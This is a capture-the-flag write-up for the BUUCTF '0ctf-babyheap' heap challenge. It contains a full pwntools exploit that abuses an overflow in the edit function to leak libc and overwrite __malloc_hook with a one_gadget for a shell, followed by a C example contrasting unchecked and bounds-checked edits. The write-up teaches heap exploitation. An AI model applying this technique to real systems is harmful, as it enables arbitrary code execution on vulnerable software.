Challenge | BUUCTF 0ctf-babyheap

This challenge allocates memory with calloc, so every chunk handed back is zeroed and whatever was written there before the free is wiped.

The edit function has a heap overflow. Since the function pointer array sits at a randomized stack address, the first idea is a fastbin attack that writes a one_gadget, but that needs the libc base first. So the plan is an information leak first, then control of pc.
Start by allocating 4 chunks:

add(0x10) #0
add(0x10) #1
add(0x80) #2
add(0x10) #3

Change the second chunk's size to 0x30 so that it covers the fd and bk of the third chunk, and forge a chunk inside the third chunk's data. Then free the second chunk and allocate a chunk of the same size again. After that, free the third chunk so that a libc address lands in it, and print the second chunk to read that libc address. Finally, allocate another fastbin-sized chunk and overwrite its fd, which gives an arbitrary address write (note that the chunk header has to be restored, because calloc zeroes it).
exp:
```python
#!/usr/bin/python2
#coding=utf-8
#name:doudou
from pwn import *

local=1
if local==1:
    p=process('../binary/0babyheap')
    elf=ELF('../binary/0babyheap')
    libc=elf.libc
else:
    p=remote('node3.buuoj.cn',25561)
    elf=ELF('../binary/0babyheap')
    libc=elf.libc

onegadget=[0x45216,0x4526a,0xf02a4,0xf1147]

def add(size):
    p.sendlineafter('Command: ','1')
    p.sendlineafter('Size: ',str(size))

def edit(idx,size,content):
    p.sendlineafter('Command: ','2')
    p.sendlineafter('Index: ',str(idx))
    p.sendlineafter('Size: ',str(size))
    p.sendlineafter('Content: ',content)

def delete(idx):
    p.sendlineafter('Command: ','3')
    p.sendlineafter('Index: ',str(idx))

def show(idx):
    p.sendlineafter('Command: ','4')
    p.sendlineafter('Index: ',str(idx))

def exp():
    add(0x10) #0
    add(0x10) #1
    add(0x80) #2
    add(0x10) #3
    # overflow from chunk 0 to set chunk 1's size to 0x41
    payload='\x00'*0x18+p64(0x41)
    edit(0,len(payload),payload)
    # fake next-chunk size inside chunk 2 so the 0x40 free passes the checks
    pd='\x00'*0x18+p64(0x71)
    edit(2,len(pd),pd)
    delete(1)
    add(0x30) #1, now overlaps chunk 2's header
    edit(1,0x20,'\x00'*0x18+p64(0x91))#calloc zeroed chunk 2's size, restore it
    delete(2) # chunk 2 goes to the unsorted bin, fd/bk point into main_arena
    #edit(1,0x20,'a'*0x20)
    show(1)
    libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-88-0x10-libc.sym['__malloc_hook']
    log.success('libcbase: '+hex(libcbase))
    malloc_hook=libcbase+libc.sym['__malloc_hook']
    one_gadget=libcbase+onegadget[1]
    log.success('One_gadge: '+hex(one_gadget))
    add(0x60) #2, carved from the unsorted chunk
    delete(2) # 0x70 chunk into the fastbin
    # overwrite the freed chunk's fd through chunk 1
    pd2='a'*0x18+p64(0x71)+p64(malloc_hook-0x23)
    edit(1,len(pd2),pd2)
    add(0x60) #2
    add(0x60) #4, the fake chunk at malloc_hook-0x23
    payload='a'*19+p64(one_gadget)
    edit(4,len(payload),payload)
    show(1)
    p.interactive()

if __name__=="__main__":
    exp()
```
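As an added illustration of the edit overflow described above (not the challenge's source, which is not on this page), here is a hypothetical chunk table with the unchecked edit pattern next to a bounds-checked version; the struct, function names and table size are assumptions.

```c
#include <stdlib.h>
#include <string.h>

#define MAX_CHUNKS 16

/* Hypothetical bookkeeping table: the real binary's layout is not on this page. */
struct chunk { void *ptr; size_t size; };
static struct chunk table[MAX_CHUNKS];

/* Allocate into the lowest free slot with calloc (zeroed, as in the challenge);
 * returns the slot index or -1. */
int chunk_add(size_t size) {
    for (int i = 0; i < MAX_CHUNKS; i++) {
        if (table[i].ptr == NULL) {
            table[i].ptr = calloc(1, size);
            if (table[i].ptr == NULL) return -1;
            table[i].size = size;
            return i;
        }
    }
    return -1;
}

/* Unchecked pattern: the copy length comes from the caller, not from the
 * recorded allocation, so a length larger than table[idx].size runs into
 * the next chunk's header. This is the bug class the write-up relies on. */
void edit_unchecked(int idx, size_t len, const char *data) {
    memcpy(table[idx].ptr, data, len);
}

/* Checked version: reject bad indexes, freed slots and oversized lengths.
 * Returns 0 on success, -1 when the request is refused. */
int edit_checked(int idx, size_t len, const char *data) {
    if (idx < 0 || idx >= MAX_CHUNKS || table[idx].ptr == NULL) return -1;
    if (len > table[idx].size) return -1;
    memcpy(table[idx].ptr, data, len);
    return 0;
}

/* Free a slot and clear it so the index cannot be edited or freed again. */
int chunk_delete(int idx) {
    if (idx < 0 || idx >= MAX_CHUNKS || table[idx].ptr == NULL) return -1;
    free(table[idx].ptr);
    table[idx].ptr = NULL;
    table[idx].size = 0;
    return 0;
}
```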
